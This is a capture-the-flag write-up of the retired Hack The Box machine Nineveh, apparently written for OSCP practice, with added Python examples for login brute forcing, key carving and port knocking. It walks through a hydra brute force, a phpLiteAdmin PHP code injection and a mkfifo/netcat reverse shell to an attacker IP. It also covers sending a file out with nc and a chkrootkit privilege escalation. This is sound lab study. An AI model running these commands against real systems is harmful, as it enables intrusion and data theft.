OSCP PREPARATIONS – HTB Nineveh

Nineveh is a retired Hack The Box machine running Linux. The goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to fingerprint the target.
Classic Scan

Full port scan

The scan shows two open ports: 80/tcp (http, Apache httpd) and 443/tcp (ssl/http, Apache httpd).
We continue enumerating both services in the browser.
Port 80

A Gobuster scan found the /department directory.

/department redirects to a login page. Default credentials and SQL injection payloads in the login parameters gave nothing.
The form does leak something useful, though: submitting the username muhammed returns "username is wrong", while submitting admin returns "password is wrong". The different messages confirm that admin is a valid account, so we only need to brute-force its password, which we do with hydra.
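The two-stage attack this oracle allows, as an added example that is not part of the original write-up. The "target" is a constructed in-memory stand-in for the /department form that answers the way the page describes; the message texts, the word list and the parameter names are assumptions:

```python
"""Two-stage login brute force driven by the error-message oracle.

Added example; not code from the write-up. The target is a constructed,
in-memory stand-in for the /department login form that behaves the way the
page describes: an unknown user gets "invalid username", a known user with a
wrong password gets "invalid password". Message texts and the word list are
assumptions.
"""
from typing import Callable, Dict, List, Optional, Tuple

Login = Callable[[str, str], str]

# Constructed stand-in for the login handler (not the real application).
FAKE_ACCOUNTS = {"admin": "1q2w3e4r5t"}  # the credentials the page recovered


def fake_login(username: str, password: str) -> str:
    if username not in FAKE_ACCOUNTS:
        return "invalid username"
    if FAKE_ACCOUNTS[username] != password:
        return "invalid password"
    return "welcome"


def enumerate_users(login: Login, candidates: List[str]) -> List[str]:
    """Stage 1: one probe per name with a junk password; the message says whether the user exists."""
    return [u for u in candidates if login(u, "not-the-password") != "invalid username"]


def guess_password(login: Login, user: str, wordlist: List[str]) -> Tuple[Optional[str], int]:
    """Stage 2: try the word list for a confirmed user. Like hydra, success is
    'the failure string is absent'. Returns (password, attempts used)."""
    for n, pw in enumerate(wordlist, 1):
        if "invalid" not in login(user, pw):
            return pw, n
    return None, len(wordlist)


def attack(login: Login, users: List[str], wordlist: List[str]) -> Tuple[List[str], Dict[str, str], int]:
    """Run both stages and count requests, to compare with the naive users x words product."""
    valid = enumerate_users(login, users)
    found: Dict[str, str] = {}
    attempts = len(users)
    for u in valid:
        pw, n = guess_password(login, u, wordlist)
        attempts += n
        if pw is not None:
            found[u] = pw
    return valid, found, attempts


def naive_cost(users: List[str], wordlist: List[str]) -> int:
    """Requests a blind attack would spend trying every user/password pair."""
    return len(users) * len(wordlist)
```

Against the real form the second stage is what hydra does with its http-post-form module, e.g. hydra -l admin -P wordlist.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password"; the path, parameter names and failure string must be copied from the captured request, and the ones shown are assumptions.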

The brute force succeeded and gave us the credentials login: admin, password: 1q2w3e4r5t.

We log in successfully, but the dashboard offers little of value. The only notable thing is that the Notes section loads its content through a GET parameter in the URL. We note this for later and move on to port 443.

Port 443

The page source contains nothing useful, so we run a Gobuster scan.
Gobuster scan

The directory scan finds /db.

This is another login form, so we try a hydra brute force here as well.

hydra recovers the credentials: host 10.10.10.43, password password123.
Let's log in with this password.

This gets us into a phpLiteAdmin v1.9 panel. Let's check searchsploit for known vulnerabilities in this version.

searchsploit lists a remote PHP code injection for this version.

The issue is that phpLiteAdmin lets an authenticated user create a database with an arbitrary file name, including a .php extension, and stores the text of every table definition inside that file. Anything that later include()s the file executes whatever PHP tags it contains.
Let's apply the steps in order:
1- Create a database named hack.php.
2- Create a table in that database whose column default value is the PHP command we want to run.
3- Get hack.php executed by the web server.
Once the file is included, our PHP code runs on the server.

Here is the resulting table definition.

To get the file executed we need something that includes it, and that is the Notes loader in the /department dashboard on port 80, which takes a file path in its GET parameter.
The first attempt did not work because we had named the database nineveh.php.
Naming the database after the default note file, ninevehNotes.txt (the loader evidently only accepts names that look like it), lets the include go through.

As you can see, we now have command injection: the command passed to our PHP payload is executed on the server.

Now let's get a reverse shell.
We first ran ls to confirm execution, then used the classic mkfifo/netcat one-liner:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4747 >/tmp/f
We send the command through Burp Suite, URL-encoded as the parameter value,
with a netcat listener on port 4747 waiting on our machine.

This is how we got our shell.

The shell runs as the web server user and cannot read the user or root flag, so we start local enumeration.

/var/www/ssl/secure_notes/nineveh.png
This image has an SSH private key embedded in it.
scp is not an option (ssh is not reachable), so we transfer the file with nc: a listener on our machine writing to a file (for example nc -lvnp 4444 > nineveh.png, any free port works) and, on the target, nc 10.10.14.13 4444 < /var/www/ssl/secure_notes/nineveh.png.
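Extracting the key from the image once it is on our machine, as an added example that is not from the write-up. The image bytes below are constructed (PNG signature, filler and a PEM block with a placeholder body), so nothing resembling the real key appears here; the same carve works on the real nineveh.png, and strings or binwalk would show the same block:

```python
"""Carving an SSH private key out of an image and storing it with usable permissions.

Added example; not code from the write-up. The image is constructed (a PNG
signature, filler, and a PEM block with a placeholder body), so nothing like the
real key appears in this text; the same carve works on the real nineveh.png
once it has been pulled back with nc. The 0600 mode is ssh's own requirement
for identity files, not something the page shows.
"""
import os
import re
import stat
import tempfile
from typing import List, Optional

# PEM armour for any private-key type (RSA, OPENSSH, EC, bare PKCS#8).
PEM_RE = re.compile(
    rb"-----BEGIN ([A-Z ]*PRIVATE KEY)-----.*?-----END \1-----\r?\n?", re.S)


def carve_private_keys(data: bytes) -> List[bytes]:
    """Return every PEM private-key block found anywhere in the blob, in order."""
    return [m.group(0) for m in PEM_RE.finditer(data)]


def save_key(key: bytes, path: Optional[str] = None) -> int:
    """Write the key and clamp it to 0600 (ssh refuses keys readable by others).
    Returns the resulting permission bits."""
    if path is None:
        path = os.path.join(tempfile.mkdtemp(), "id_rsa")
    with open(path, "wb") as fh:
        fh.write(key)
    os.chmod(path, 0o600)
    return stat.S_IMODE(os.stat(path).st_mode)


def constructed_png_with_key() -> bytes:
    """Constructed sample: PNG header, filler, a dummy PEM block, IEND. Not a real key."""
    key = (b"-----BEGIN RSA PRIVATE KEY-----\n"
           + b"A" * 48 + b"\n"
           + b"-----END RSA PRIVATE KEY-----\n")
    return b"\x89PNG\r\n\x1a\n" + b"\x00" * 48 + b"IDAT" + key + b"IEND\xaeB`\x82"
```

After saving, ssh -i id_rsa user@10.10.10.43 is the next step; on this box it only works once the port has been opened, which the next section covers.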

We saved the SSH key and tried to connect, but ssh failed: nothing in the nmap scan showed port 22 open.

So we continue with local enumeration.

Here we see that something is going on with ports 571, 290 and 911. This looks like port knocking: SSH is hidden from the outside and only opened after these ports are hit in a specific order. One way to confirm it is to look for knockd's configuration files.

The knockd configuration confirms it: if ports 571, 290 and 911 receive a SYN in that order within the 5-second seq_timeout, the start command opens the SSH port for the knocking host.

So we knock on the ports with the knock tool.

A new scan shows that port 22 is now open.
Now let's connect with the SSH key.
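What knockd is actually checking, and a minimal knocker, as an added example that is not part of the write-up. The model reproduces the two rules that explain a knock that "does not work" (order and the seq_timeout window, which knockd measures in seconds); the sequence and timeout are the values found in the configuration above, while the knock() client's pause and connect timeout are assumptions:

```python
"""Port knocking: a model of knockd's sequence matching plus a knock client.

Added example; not code from the write-up. KnockSequence mirrors the two rules
that explain a knock that "does not work": the hits must arrive in the
configured order, and the whole sequence must complete within seq_timeout,
which knockd measures in seconds. The sequence and timeout are the values found
in the knockd configuration on the box; knock() is a plain TCP-connect knocker
(not run here) and its pause and connect timeout are assumptions.
"""
import socket
import time
from typing import Iterable


class KnockSequence:
    """Simplified model of one knockd door. A wrong port discards the attempt;
    the next hit on the first port starts over."""

    def __init__(self, sequence: Iterable[int], seq_timeout: float = 5.0):
        self.sequence = list(sequence)
        self.seq_timeout = seq_timeout
        self._reset()

    def _reset(self) -> None:
        self.stage = 0
        self.first_hit = None

    def hit(self, port: int, now: float) -> bool:
        """Feed one SYN seen at time `now`; True when the door just opened."""
        if self.stage and now - self.first_hit > self.seq_timeout:
            self._reset()                       # too slow: attempt expired
        if port != self.sequence[self.stage]:
            self._reset()                       # out of order: discarded
            return False
        if self.stage == 0:
            self.first_hit = now
        self.stage += 1
        if self.stage == len(self.sequence):
            self._reset()                       # start_command would run now
            return True
        return False


def knock(host: str, sequence=(571, 290, 911), timeout: float = 0.3, pause: float = 0.2) -> None:
    """Send one TCP SYN per port, in order. A refused connection is fine: knockd
    sees the SYN before the kernel answers with RST. Keep timeout*len(sequence)
    well under seq_timeout, or a filtered port will burn the whole window."""
    for port in sequence:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:
            pass                                # RST or timeout: the SYN was still sent
        finally:
            s.close()
        time.sleep(pause)
```

The knock CLI does the same thing (knock -v 10.10.10.43 571 290 911); either way, follow it with nmap -p 22 10.10.10.43 to confirm the port opened.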

As you can see, the SSH connection works and we can read the user flag.
This user is not root, so we need to escalate privileges.

We run local enumeration again.

At the end of the LinPEAS scan, /usr/sbin/report-reset.sh stands out as a candidate for privilege escalation.

It is run from a crontab and deletes the txt files in the /report directory. What matters is which user the job runs as: if it runs as root, we can try to abuse it.
To see what runs in the background and as whom, we upload pspy to the target and run it.

pspy shows chkrootkit being executed over and over. Let's check searchsploit for exploits related to it.

searchsploit shows a local privilege escalation for chkrootkit. To use it, in order:
We create a file named update in the /tmp directory as a non-root user.
Then we write a bash script into this update file that gives us a shell, and make it executable. The next time chkrootkit runs as root it executes /tmp/update.

This gives us a root shell
and we read the root flag.